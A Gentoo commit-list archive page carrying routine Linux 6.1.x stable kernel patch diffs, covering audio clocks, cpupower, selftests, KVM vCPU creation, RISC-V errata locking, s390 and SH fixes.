+ 		afe_priv->lookup[i] = cl;
+ 	}
+ 
+-	return 0;
++	return devm_add_action_or_reset(afe->dev, mt8186_audsys_clk_unregister, afe);
+ }
+ 
+-void mt8186_audsys_clk_unregister(struct mtk_base_afe *afe)
+-{
+-	struct mt8186_afe_private *afe_priv = afe->platform_priv;
+-	struct clk *clk;
+-	struct clk_lookup *cl;
+-	int i;
+-
+-	if (!afe_priv)
+-		return;
+-
+-	for (i = 0; i < CLK_AUD_NR_CLK; i++) {
+-		cl = afe_priv->lookup[i];
+-		if (!cl)
+-			continue;
+-
+-		clk = cl->clk;
+-		clk_unregister_gate(clk);
+-
+-		clkdev_drop(cl);
+-	}
+-}
+diff --git a/sound/soc/mediatek/mt8186/mt8186-audsys-clk.h b/sound/soc/mediatek/mt8186/mt8186-audsys-clk.h
+index b8d6a06e11e8d..897a2914dc191 100644
+--- a/sound/soc/mediatek/mt8186/mt8186-audsys-clk.h
++++ b/sound/soc/mediatek/mt8186/mt8186-audsys-clk.h
+@@ -10,6 +10,5 @@
+ #define _MT8186_AUDSYS_CLK_H_
+ 
+ int mt8186_audsys_clk_register(struct mtk_base_afe *afe);
+-void mt8186_audsys_clk_unregister(struct mtk_base_afe *afe);
+ 
+ #endif
+diff --git a/sound/soc/sof/topology.c b/sound/soc/sof/topology.c
+index 6a0e7f3b50234..872e44408298f 100644
+--- a/sound/soc/sof/topology.c
++++ b/sound/soc/sof/topology.c
+@@ -545,6 +545,10 @@ static int sof_copy_tuples(struct snd_sof_dev *sdev, struct snd_soc_tplg_vendor_
+ 				if (*num_copied_tuples == tuples_size)
+ 					return 0;
+ 			}
++
++			/* stop when we've found the required token instances */
++			if (found == num_tokens * token_instance_num)
++				return 0;
+ 		}
+ 
+ 		/* next array */
+diff --git a/sound/usb/format.c b/sound/usb/format.c
+index 4b1c5ba121f39..ab5fed9f55b60 100644
+--- a/sound/usb/format.c
++++ b/sound/usb/format.c
+@@ -423,6 +423,7 @@ static int line6_parse_audio_format_rates_quirk(struct snd_usb_audio *chip,
+ 	case USB_ID(0x0e41, 0x4248): /* Line6 Helix >= fw 2.82 */
+ 	case USB_ID(0x0e41, 0x4249): /* Line6 Helix Rack >= fw 2.82 */
+ 	case USB_ID(0x0e41, 0x424a): /* Line6 Helix LT >= fw 2.82 */
++	case USB_ID(0x0e41, 0x424b): /* Line6 Pod Go */
+ 	case USB_ID(0x19f7, 0x0011): /* Rode Rodecaster Pro */
+ 		return set_fixed_rate(fp, 48000, SNDRV_PCM_RATE_48000);
+ 	}
+diff --git a/tools/include/uapi/asm-generic/fcntl.h b/tools/include/uapi/asm-generic/fcntl.h
+index b02c8e0f40575..1c7a0f6632c09 100644
+--- a/tools/include/uapi/asm-generic/fcntl.h
++++ b/tools/include/uapi/asm-generic/fcntl.h
+@@ -91,7 +91,6 @@
+ 
+ /* a horrid kludge trying to make sure that this will fail on old kernels */
+ #define O_TMPFILE (__O_TMPFILE | O_DIRECTORY)
+-#define O_TMPFILE_MASK (__O_TMPFILE | O_DIRECTORY | O_CREAT)      
+ 
+ #ifndef O_NDELAY
+ #define O_NDELAY	O_NONBLOCK
+diff --git a/tools/power/cpupower/utils/idle_monitor/mperf_monitor.c b/tools/power/cpupower/utils/idle_monitor/mperf_monitor.c
+index e7d48cb563c0e..ae6af354a81db 100644
+--- a/tools/power/cpupower/utils/idle_monitor/mperf_monitor.c
++++ b/tools/power/cpupower/utils/idle_monitor/mperf_monitor.c
+@@ -70,8 +70,8 @@ static int max_freq_mode;
+  */
+ static unsigned long max_frequency;
+ 
+-static unsigned long long tsc_at_measure_start;
+-static unsigned long long tsc_at_measure_end;
++static unsigned long long *tsc_at_measure_start;
++static unsigned long long *tsc_at_measure_end;
+ static unsigned long long *mperf_previous_count;
+ static unsigned long long *aperf_previous_count;
+ static unsigned long long *mperf_current_count;
+@@ -169,7 +169,7 @@ static int mperf_get_count_percent(unsigned int id, double *percent,
+ 	aperf_diff = aperf_current_count[cpu] - aperf_previous_count[cpu];
+ 
+ 	if (max_freq_mode == MAX_FREQ_TSC_REF) {
+-		tsc_diff = tsc_at_measure_end - tsc_at_measure_start;
++		tsc_diff = tsc_at_measure_end[cpu] - tsc_at_measure_start[cpu];
+ 		*percent = 100.0 * mperf_diff / tsc_diff;
+ 		dprint("%s: TSC Ref - mperf_diff: %llu, tsc_diff: %llu\n",
+ 		       mperf_cstates[id].name, mperf_diff, tsc_diff);
+@@ -206,7 +206,7 @@ static int mperf_get_count_freq(unsigned int id, unsigned long long *count,
+ 
+ 	if (max_freq_mode == MAX_FREQ_TSC_REF) {
+ 		/* Calculate max_freq from TSC count */
+-		tsc_diff = tsc_at_measure_end - tsc_at_measure_start;
++		tsc_diff = tsc_at_measure_end[cpu] - tsc_at_measure_start[cpu];
+ 		time_diff = timespec_diff_us(time_start, time_end);
+ 		max_frequency = tsc_diff / time_diff;
+ 	}
+@@ -225,33 +225,27 @@ static int mperf_get_count_freq(unsigned int id, unsigned long long *count,
+ static int mperf_start(void)
+ {
+ 	int cpu;
+-	unsigned long long dbg;
+ 
+ 	clock_gettime(CLOCK_REALTIME, &time_start);
+-	mperf_get_tsc(&tsc_at_measure_start);
+ 
+-	for (cpu = 0; cpu < cpu_count; cpu++)
++	for (cpu = 0; cpu < cpu_count; cpu++) {
++		mperf_get_tsc(&tsc_at_measure_start[cpu]);
+ 		mperf_init_stats(cpu);
++	}
+ 
+-	mperf_get_tsc(&dbg);
+-	dprint("TSC diff: %llu\n", dbg - tsc_at_measure_start);
+ 	return 0;
+ }
+ 
+ static int mperf_stop(void)
+ {
+-	unsigned long long dbg;
+ 	int cpu;
+ 
+-	for (cpu = 0; cpu < cpu_count; cpu++)
++	for (cpu = 0; cpu < cpu_count; cpu++) {
+ 		mperf_measure_stats(cpu);
++		mperf_get_tsc(&tsc_at_measure_end[cpu]);
++	}
+ 
+-	mperf_get_tsc(&tsc_at_measure_end);
+ 	clock_gettime(CLOCK_REALTIME, &time_end);
+-
+-	mperf_get_tsc(&dbg);
+-	dprint("TSC diff: %llu\n", dbg - tsc_at_measure_end);
+-
+ 	return 0;
+ }
+ 
+@@ -353,7 +347,8 @@ struct cpuidle_monitor *mperf_register(void)
+ 	aperf_previous_count = calloc(cpu_count, sizeof(unsigned long long));
+ 	mperf_current_count = calloc(cpu_count, sizeof(unsigned long long));
+ 	aperf_current_count = calloc(cpu_count, sizeof(unsigned long long));
+-
++	tsc_at_measure_start = calloc(cpu_count, sizeof(unsigned long long));
++	tsc_at_measure_end = calloc(cpu_count, sizeof(unsigned long long));
+ 	mperf_monitor.name_len = strlen(mperf_monitor.name);
+ 	return &mperf_monitor;
+ }
+@@ -364,6 +359,8 @@ void mperf_unregister(void)
+ 	free(aperf_previous_count);
+ 	free(mperf_current_count);
+ 	free(aperf_current_count);
++	free(tsc_at_measure_start);
++	free(tsc_at_measure_end);
+ 	free(is_valid);
+ }
+ 
+diff --git a/tools/testing/selftests/cgroup/test_memcontrol.c b/tools/testing/selftests/cgroup/test_memcontrol.c
+index 8833359556f38..fe4f9f4302822 100644
+--- a/tools/testing/selftests/cgroup/test_memcontrol.c
++++ b/tools/testing/selftests/cgroup/test_memcontrol.c
+@@ -98,6 +98,11 @@ static int alloc_anon_50M_check(const char *cgroup, void *arg)
+ 	int ret = -1;
+ 
+ 	buf = malloc(size);
++	if (buf == NULL) {
++		fprintf(stderr, "malloc() failed\n");
++		return -1;
++	}
++
+ 	for (ptr = buf; ptr < buf + size; ptr += PAGE_SIZE)
+ 		*ptr = 0;
+ 
+@@ -211,6 +216,11 @@ static int alloc_anon_noexit(const char *cgroup, void *arg)
+ 	char *buf, *ptr;
+ 
+ 	buf = malloc(size);
++	if (buf == NULL) {
++		fprintf(stderr, "malloc() failed\n");
++		return -1;
++	}
++
+ 	for (ptr = buf; ptr < buf + size; ptr += PAGE_SIZE)
+ 		*ptr = 0;
+ 
+@@ -759,6 +769,11 @@ static int alloc_anon_50M_check_swap(const char *cgroup, void *arg)
+ 	int ret = -1;
+ 
+ 	buf = malloc(size);
++	if (buf == NULL) {
++		fprintf(stderr, "malloc() failed\n");
++		return -1;
++	}
++
+ 	for (ptr = buf; ptr < buf + size; ptr += PAGE_SIZE)
+ 		*ptr = 0;
+ 
+diff --git a/tools/testing/selftests/net/fib_nexthops.sh b/tools/testing/selftests/net/fib_nexthops.sh
+index a47b26ab48f23..0f5e88c8f4ffe 100755
+--- a/tools/testing/selftests/net/fib_nexthops.sh
++++ b/tools/testing/selftests/net/fib_nexthops.sh
+@@ -2283,7 +2283,7 @@ EOF
+ ################################################################################
+ # main
+ 
+-while getopts :t:pP46hv:w: o
++while getopts :t:pP46hvw: o
+ do
+ 	case $o in
+ 		t) TESTS=$OPTARG;;
+diff --git a/tools/testing/selftests/net/srv6_end_dt4_l3vpn_test.sh b/tools/testing/selftests/net/srv6_end_dt4_l3vpn_test.sh
+index 1003119773e5d..f962823628119 100755
+--- a/tools/testing/selftests/net/srv6_end_dt4_l3vpn_test.sh
++++ b/tools/testing/selftests/net/srv6_end_dt4_l3vpn_test.sh
+@@ -232,10 +232,14 @@ setup_rt_networking()
+ 	local nsname=rt-${rt}
+ 
+ 	ip netns add ${nsname}
++
++	ip netns exec ${nsname} sysctl -wq net.ipv6.conf.all.accept_dad=0
++	ip netns exec ${nsname} sysctl -wq net.ipv6.conf.default.accept_dad=0
++
+ 	ip link set veth-rt-${rt} netns ${nsname}
+ 	ip -netns ${nsname} link set veth-rt-${rt} name veth0
+ 
+-	ip -netns ${nsname} addr add ${IPv6_RT_NETWORK}::${rt}/64 dev veth0
++	ip -netns ${nsname} addr add ${IPv6_RT_NETWORK}::${rt}/64 dev veth0 nodad
+ 	ip -netns ${nsname} link set veth0 up
+ 	ip -netns ${nsname} link set lo up
+ 
+@@ -254,6 +258,12 @@ setup_hs()
+ 
+ 	# set the networking for the host
+ 	ip netns add ${hsname}
++
++	# disable the rp_filter otherwise the kernel gets confused about how
++	# to route decap ipv4 packets.
++	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.all.rp_filter=0
++	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.default.rp_filter=0
++
+ 	ip -netns ${hsname} link add veth0 type veth peer name ${rtveth}
+ 	ip -netns ${hsname} link set ${rtveth} netns ${rtname}
+ 	ip -netns ${hsname} addr add ${IPv4_HS_NETWORK}.${hs}/24 dev veth0
+@@ -272,11 +282,6 @@ setup_hs()
+ 
+ 	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.${rtveth}.proxy_arp=1
+ 
+-	# disable the rp_filter otherwise the kernel gets confused about how
+-	# to route decap ipv4 packets.
+-	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.all.rp_filter=0
+-	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.${rtveth}.rp_filter=0
+-
+ 	ip netns exec ${rtname} sh -c "echo 1 > /proc/sys/net/vrf/strict_mode"
+ }
+ 
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index 3a3c1bc3e303f..de8e5eb6af106 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -3947,18 +3947,19 @@ static int kvm_vm_ioctl_create_vcpu(struct kvm *kvm, u32 id)
+ 	}
+ 
+ 	vcpu->vcpu_idx = atomic_read(&kvm->online_vcpus);
+-	r = xa_insert(&kvm->vcpu_array, vcpu->vcpu_idx, vcpu, GFP_KERNEL_ACCOUNT);
+-	BUG_ON(r == -EBUSY);
++	r = xa_reserve(&kvm->vcpu_array, vcpu->vcpu_idx, GFP_KERNEL_ACCOUNT);
+ 	if (r)
+ 		goto unlock_vcpu_destroy;
+ 
+ 	/* Now it's all set up, let userspace reach it */
+ 	kvm_get_kvm(kvm);
+ 	r = create_vcpu_fd(vcpu);
+-	if (r < 0) {
+-		xa_erase(&kvm->vcpu_array, vcpu->vcpu_idx);
+-		kvm_put_kvm_no_destroy(kvm);
+-		goto unlock_vcpu_destroy;
++	if (r < 0)
++		goto kvm_put_xa_release;
++
++	if (KVM_BUG_ON(!!xa_store(&kvm->vcpu_array, vcpu->vcpu_idx, vcpu, 0), kvm)) {
++		r = -EINVAL;
++		goto kvm_put_xa_release;
+ 	}
+ 
+ 	/*
+@@ -3973,6 +3974,9 @@ static int kvm_vm_ioctl_create_vcpu(struct kvm *kvm, u32 id)
+ 	kvm_create_vcpu_debugfs(vcpu);
+ 	return r;
+ 
++kvm_put_xa_release:
++	kvm_put_kvm_no_destroy(kvm);
++	xa_release(&kvm->vcpu_array, vcpu->vcpu_idx);
+ unlock_vcpu_destroy:
+ 	mutex_unlock(&kvm->lock);
+ 	kvm_dirty_ring_free(&vcpu->dirty_ring);


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-17 10:57 Mike Pagano
From: Mike Pagano @ 2023-05-17 10:57 UTC
  To: gentoo-commits

commit:     800648f486b3c55fff4995e849dad07d684858ac
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed May 17 10:57:20 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed May 17 10:57:20 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=800648f4

Linux patch 6.1.29

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1028_linux-6.1.29.patch | 16121 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 16125 insertions(+)

diff --git a/0000_README b/0000_README
index dd54d67d..9c3afe15 100644
--- a/0000_README
+++ b/0000_README
@@ -155,6 +155,10 @@ Patch:  1027_linux-6.1.28.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.28
 
+Patch:  1028_linux-6.1.29.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.29
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1028_linux-6.1.29.patch b/1028_linux-6.1.29.patch
new file mode 100644
index 00000000..06c8b0c4
--- /dev/null
+++ b/1028_linux-6.1.29.patch
@@ -0,0 +1,16121 @@
+diff --git a/Makefile b/Makefile
+index 2d221b879c48f..f02f6e1ac5743 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 28
++SUBLEVEL = 29
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts b/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts
+index 9b4cf5ebe6d5f..c62aff908ab48 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-asrock-e3c246d4i.dts
+@@ -63,7 +63,7 @@
+ 		status = "okay";
+ 		m25p,fast-read;
+ 		label = "bmc";
+-		spi-max-frequency = <100000000>; /* 100 MHz */
++		spi-max-frequency = <50000000>; /* 50 MHz */
+ #include "openbmc-flash-layout.dtsi"
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts b/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts
+index ff4c07c69af1c..4554abf0c7cdf 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-asrock-romed8hm3.dts
+@@ -31,7 +31,7 @@
+ 		};
+ 
+ 		system-fault {
+-			gpios = <&gpio ASPEED_GPIO(Z, 2) GPIO_ACTIVE_LOW>;
++			gpios = <&gpio ASPEED_GPIO(Z, 2) GPIO_ACTIVE_HIGH>;
+ 			panic-indicator;
+ 		};
+ 	};
+@@ -51,7 +51,7 @@
+ 		status = "okay";
+ 		m25p,fast-read;
+ 		label = "bmc";
+-		spi-max-frequency = <100000000>; /* 100 MHz */
++		spi-max-frequency = <50000000>; /* 50 MHz */
+ #include "openbmc-flash-layout-64.dtsi"
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/exynos4412-itop-elite.dts b/arch/arm/boot/dts/exynos4412-itop-elite.dts
+index 202ab0fee3b70..bfc79490e2e22 100644
+--- a/arch/arm/boot/dts/exynos4412-itop-elite.dts
++++ b/arch/arm/boot/dts/exynos4412-itop-elite.dts
+@@ -182,7 +182,7 @@
+ 		compatible = "wlf,wm8960";
+ 		reg = <0x1a>;
+ 		clocks = <&pmu_system_controller 0>;
+-		clock-names = "MCLK1";
++		clock-names = "mclk";
+ 		wlf,shared-lrclk;
+ 		#sound-dai-cells = <0>;
+ 	};
+diff --git a/arch/arm/boot/dts/s5pv210.dtsi b/arch/arm/boot/dts/s5pv210.dtsi
+index 12e90a1cc6a14..1a9e4a96b2ff7 100644
+--- a/arch/arm/boot/dts/s5pv210.dtsi
++++ b/arch/arm/boot/dts/s5pv210.dtsi
+@@ -566,7 +566,7 @@
+ 				interrupts = <29>;
+ 				clocks = <&clocks CLK_CSIS>,
+ 						<&clocks SCLK_CSIS>;
+-				clock-names = "clk_csis",
++				clock-names = "csis",
+ 						"sclk_csis";
+ 				bus-width = <4>;
+ 				status = "disabled";
+diff --git a/arch/riscv/errata/sifive/errata.c b/arch/riscv/errata/sifive/errata.c
+index 1031038423e74..c24a349dd026d 100644
+--- a/arch/riscv/errata/sifive/errata.c
++++ b/arch/riscv/errata/sifive/errata.c
+@@ -4,6 +4,7 @@
+  */
+ 
+ #include <linux/kernel.h>
++#include <linux/memory.h>
+ #include <linux/module.h>
+ #include <linux/string.h>
+ #include <linux/bug.h>
+@@ -107,7 +108,9 @@ void __init_or_module sifive_errata_patch_func(struct alt_entry *begin,
+ 
+ 		tmp = (1U << alt->errata_id);
+ 		if (cpu_req_errata & tmp) {
++			mutex_lock(&text_mutex);
+ 			patch_text_nosync(alt->old_ptr, alt->alt_ptr, alt->alt_len);
++			mutex_unlock(&text_mutex);
+ 			cpu_apply_errata |= tmp;
+ 		}
+ 	}
+diff --git a/arch/riscv/errata/thead/errata.c b/arch/riscv/errata/thead/errata.c
+index 21546937db39b..32a34ed735098 100644
+--- a/arch/riscv/errata/thead/errata.c
++++ b/arch/riscv/errata/thead/errata.c
+@@ -5,6 +5,7 @@
+ 
+ #include <linux/bug.h>
+ #include <linux/kernel.h>
++#include <linux/memory.h>
+ #include <linux/module.h>
+ #include <linux/string.h>
+ #include <linux/uaccess.h>
+@@ -78,11 +79,14 @@ void __init_or_module thead_errata_patch_func(struct alt_entry *begin, struct al
+ 		tmp = (1U << alt->errata_id);
+ 		if (cpu_req_errata & tmp) {
+ 			/* On vm-alternatives, the mmu isn't running yet */
+-			if (stage == RISCV_ALTERNATIVES_EARLY_BOOT)
++			if (stage == RISCV_ALTERNATIVES_EARLY_BOOT) {
+ 				memcpy((void *)__pa_symbol(alt->old_ptr),
+ 				       (void *)__pa_symbol(alt->alt_ptr), alt->alt_len);
+-			else
++			} else {
++				mutex_lock(&text_mutex);
+ 				patch_text_nosync(alt->old_ptr, alt->alt_ptr, alt->alt_len);
++				mutex_unlock(&text_mutex);
++			}
+ 		}
+ 	}
+ 
+diff --git a/arch/riscv/kernel/Makefile b/arch/riscv/kernel/Makefile
+index db6e4b1294ba3..ab333cb792fd9 100644
+--- a/arch/riscv/kernel/Makefile
++++ b/arch/riscv/kernel/Makefile
+@@ -9,6 +9,7 @@ CFLAGS_REMOVE_patch.o	= $(CC_FLAGS_FTRACE)
+ CFLAGS_REMOVE_sbi.o	= $(CC_FLAGS_FTRACE)
+ endif
+ CFLAGS_syscall_table.o	+= $(call cc-option,-Wno-override-init,)
++CFLAGS_compat_syscall_table.o += $(call cc-option,-Wno-override-init,)
+ 
+ ifdef CONFIG_KEXEC
+ AFLAGS_kexec_relocate.o := -mcmodel=medany $(call cc-option,-mno-relax)
+diff --git a/arch/riscv/kernel/cpufeature.c b/arch/riscv/kernel/cpufeature.c
+index 694267d1fe814..fd1238df61497 100644
+--- a/arch/riscv/kernel/cpufeature.c
++++ b/arch/riscv/kernel/cpufeature.c
+@@ -9,6 +9,7 @@
+ #include <linux/bitmap.h>
+ #include <linux/ctype.h>
+ #include <linux/libfdt.h>
++#include <linux/memory.h>
+ #include <linux/module.h>
+ #include <linux/of.h>
+ #include <asm/alternative.h>
+@@ -316,8 +317,11 @@ void __init_or_module riscv_cpufeature_patch_func(struct alt_entry *begin,
+ 		}
+ 
+ 		tmp = (1U << alt->errata_id);
+-		if (cpu_req_feature & tmp)
++		if (cpu_req_feature & tmp) {
++			mutex_lock(&text_mutex);
+ 			patch_text_nosync(alt->old_ptr, alt->alt_ptr, alt->alt_len);
++			mutex_unlock(&text_mutex);
++		}
+ 	}
+ }
+ #endif
+diff --git a/arch/riscv/mm/pageattr.c b/arch/riscv/mm/pageattr.c
+index 86c56616e5dea..ea3d61de065b3 100644
+--- a/arch/riscv/mm/pageattr.c
++++ b/arch/riscv/mm/pageattr.c
+@@ -217,18 +217,26 @@ bool kernel_page_present(struct page *page)
+ 	pgd = pgd_offset_k(addr);
+ 	if (!pgd_present(*pgd))
+ 		return false;
++	if (pgd_leaf(*pgd))
++		return true;
+ 
+ 	p4d = p4d_offset(pgd, addr);
+ 	if (!p4d_present(*p4d))
+ 		return false;
++	if (p4d_leaf(*p4d))
++		return true;
+ 
+ 	pud = pud_offset(p4d, addr);
+ 	if (!pud_present(*pud))
+ 		return false;
++	if (pud_leaf(*pud))
++		return true;
+ 
+ 	pmd = pmd_offset(pud, addr);
+ 	if (!pmd_present(*pmd))
+ 		return false;
++	if (pmd_leaf(*pmd))
++		return true;
+ 
+ 	pte = pte_offset_kernel(pmd, addr);
+ 	return pte_present(*pte);
+diff --git a/arch/s390/kernel/uv.c b/arch/s390/kernel/uv.c
+index f9810d2a267c6..5caa0ed2b594a 100644
+--- a/arch/s390/kernel/uv.c
++++ b/arch/s390/kernel/uv.c
+@@ -192,21 +192,10 @@ static int expected_page_refs(struct page *page)
+ 	return res;
+ }
+ 
+-static int make_secure_pte(pte_t *ptep, unsigned long addr,
+-			   struct page *exp_page, struct uv_cb_header *uvcb)
++static int make_page_secure(struct page *page, struct uv_cb_header *uvcb)
+ {
+-	pte_t entry = READ_ONCE(*ptep);
+-	struct page *page;
+ 	int expected, cc = 0;
+ 
+-	if (!pte_present(entry))
+-		return -ENXIO;
+-	if (pte_val(entry) & _PAGE_INVALID)
+-		return -ENXIO;
+-
+-	page = pte_page(entry);
+-	if (page != exp_page)
+-		return -ENXIO;
+ 	if (PageWriteback(page))
+ 		return -EAGAIN;
+ 	expected = expected_page_refs(page);
+@@ -297,17 +286,18 @@ again:
+ 		goto out;
+ 
+ 	rc = -ENXIO;
+-	page = follow_page(vma, uaddr, FOLL_WRITE);
+-	if (IS_ERR_OR_NULL(page))
+-		goto out;
+-
+-	lock_page(page);
+ 	ptep = get_locked_pte(gmap->mm, uaddr, &ptelock);
+-	if (should_export_before_import(uvcb, gmap->mm))
+-		uv_convert_from_secure(page_to_phys(page));
+-	rc = make_secure_pte(ptep, uaddr, page, uvcb);
++	if (pte_present(*ptep) && !(pte_val(*ptep) & _PAGE_INVALID) && pte_write(*ptep)) {
++		page = pte_page(*ptep);
++		rc = -EAGAIN;
++		if (trylock_page(page)) {
++			if (should_export_before_import(uvcb, gmap->mm))
++				uv_convert_from_secure(page_to_phys(page));
++			rc = make_page_secure(page, uvcb);
++			unlock_page(page);
++		}
++	}
+ 	pte_unmap_unlock(ptep, ptelock);
+-	unlock_page(page);
+ out:
+ 	mmap_read_unlock(gmap->mm);
+ 
+diff --git a/arch/sh/Kconfig.debug b/arch/sh/Kconfig.debug
+index 10290e5c1f438..c449e7c1b20ff 100644
+--- a/arch/sh/Kconfig.debug
++++ b/arch/sh/Kconfig.debug
+@@ -15,7 +15,7 @@ config SH_STANDARD_BIOS
+ 
+ config STACK_DEBUG
+ 	bool "Check for stack overflows"
+-	depends on DEBUG_KERNEL
++	depends on DEBUG_KERNEL && PRINTK
+ 	help
+ 	  This option will cause messages to be printed if free stack space
+ 	  drops below a certain limit. Saying Y here will add overhead to
+diff --git a/arch/sh/kernel/head_32.S b/arch/sh/kernel/head_32.S
+index 4adbd4ade3194..b603b7968b388 100644
+--- a/arch/sh/kernel/head_32.S
++++ b/arch/sh/kernel/head_32.S
+@@ -64,7 +64,7 @@ ENTRY(_stext)
+ 	ldc	r0, r6_bank
+ #endif
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ 	mov	r4, r12		! Store device tree blob pointer in r12
+ #endif
+ 	
+@@ -315,7 +315,7 @@ ENTRY(_stext)
+ 10:		
+ #endif
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ 	mov.l	8f, r0		! Make flat device tree available early.
+ 	jsr	@r0
+ 	 mov	r12, r4
+@@ -346,7 +346,7 @@ ENTRY(stack_start)
+ 5:	.long	start_kernel
+ 6:	.long	cpu_init
+ 7:	.long	init_thread_union
+-#if defined(CONFIG_OF_FLATTREE)
++#if defined(CONFIG_OF_EARLY_FLATTREE)
+ 8:	.long	sh_fdt_init
+ #endif
+ 
+diff --git a/arch/sh/kernel/nmi_debug.c b/arch/sh/kernel/nmi_debug.c
+index 11777867c6f5f..a212b645b4cf8 100644
+--- a/arch/sh/kernel/nmi_debug.c
++++ b/arch/sh/kernel/nmi_debug.c
+@@ -49,7 +49,7 @@ static int __init nmi_debug_setup(char *str)
+ 	register_die_notifier(&nmi_debug_nb);
+ 
+ 	if (*str != '=')
+-		return 0;
++		return 1;
+ 
+ 	for (p = str + 1; *p; p = sep + 1) {
+ 		sep = strchr(p, ',');
+@@ -70,6 +70,6 @@ static int __init nmi_debug_setup(char *str)
+ 			break;
+ 	}
+ 
+-	return 0;
++	return 1;
+ }
+ __setup("nmi_debug", nmi_debug_setup);
+diff --git a/arch/sh/kernel/setup.c b/arch/sh/kernel/setup.c
+index 1fcb6659822a3..af977ec4ca5e5 100644
+--- a/arch/sh/kernel/setup.c
++++ b/arch/sh/kernel/setup.c
+@@ -244,7 +244,7 @@ void __init __weak plat_early_device_setup(void)
+ {
+ }
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ void __ref sh_fdt_init(phys_addr_t dt_phys)
+ {
+ 	static int done = 0;
+@@ -326,7 +326,7 @@ void __init setup_arch(char **cmdline_p)
+ 	/* Let earlyprintk output early console messages */
+ 	sh_early_platform_driver_probe("earlyprintk", 1, 1);
+ 
+-#ifdef CONFIG_OF_FLATTREE
++#ifdef CONFIG_OF_EARLY_FLATTREE
+ #ifdef CONFIG_USE_BUILTIN_DTB
+ 	unflatten_and_copy_device_tree();
+ #else
+diff --git a/arch/sh/math-emu/sfp-util.h b/arch/sh/math-emu/sfp-util.h
+index 784f541344f36..bda50762b3d33 100644
+--- a/arch/sh/math-emu/sfp-util.h
++++ b/arch/sh/math-emu/sfp-util.h
+@@ -67,7 +67,3 @@
+   } while (0)
+ 
+ #define abort()	return 0
+-
+-#define __BYTE_ORDER __LITTLE_ENDIAN
+-
+-
+diff --git a/arch/x86/events/intel/lbr.c b/arch/x86/events/intel/lbr.c
+index 8259d725054d0..4dbde69c423ba 100644
+--- a/arch/x86/events/intel/lbr.c
++++ b/arch/x86/events/intel/lbr.c
+@@ -1603,10 +1603,8 @@ clear_arch_lbr:
+  * x86_perf_get_lbr - get the LBR records information
+  *
+  * @lbr: the caller's memory to store the LBR records information
+- *
+- * Returns: 0 indicates the LBR info has been successfully obtained
+  */
+-int x86_perf_get_lbr(struct x86_pmu_lbr *lbr)
++void x86_perf_get_lbr(struct x86_pmu_lbr *lbr)
+ {
+ 	int lbr_fmt = x86_pmu.intel_cap.lbr_format;
+ 
+@@ -1614,8 +1612,6 @@ int x86_perf_get_lbr(struct x86_pmu_lbr *lbr)
+ 	lbr->from = x86_pmu.lbr_from;
+ 	lbr->to = x86_pmu.lbr_to;
+ 	lbr->info = (lbr_fmt == LBR_FORMAT_INFO) ? x86_pmu.lbr_info : 0;
+-
+-	return 0;
+ }
+ EXPORT_SYMBOL_GPL(x86_perf_get_lbr);
+ 
+diff --git a/arch/x86/include/asm/perf_event.h b/arch/x86/include/asm/perf_event.h
+index 9ac46dbe57d48..5d0f6891ae611 100644
+--- a/arch/x86/include/asm/perf_event.h
++++ b/arch/x86/include/asm/perf_event.h
+@@ -543,12 +543,12 @@ static inline void perf_check_microcode(void) { }
+ 
+ #if defined(CONFIG_PERF_EVENTS) && defined(CONFIG_CPU_SUP_INTEL)
+ extern struct perf_guest_switch_msr *perf_guest_get_msrs(int *nr, void *data);
+-extern int x86_perf_get_lbr(struct x86_pmu_lbr *lbr);
++extern void x86_perf_get_lbr(struct x86_pmu_lbr *lbr);
+ #else
+ struct perf_guest_switch_msr *perf_guest_get_msrs(int *nr, void *data);
+-static inline int x86_perf_get_lbr(struct x86_pmu_lbr *lbr)
++static inline void x86_perf_get_lbr(struct x86_pmu_lbr *lbr)
+ {
+-	return -1;
++	memset(lbr, 0, sizeof(*lbr));
+ }
+ #endif
+ 
+diff --git a/arch/x86/kernel/amd_nb.c b/arch/x86/kernel/amd_nb.c
+index 4266b64631a46..7e331e8f36929 100644
+--- a/arch/x86/kernel/amd_nb.c
++++ b/arch/x86/kernel/amd_nb.c
+@@ -36,6 +36,7 @@
+ #define PCI_DEVICE_ID_AMD_19H_M50H_DF_F4 0x166e
+ #define PCI_DEVICE_ID_AMD_19H_M60H_DF_F4 0x14e4
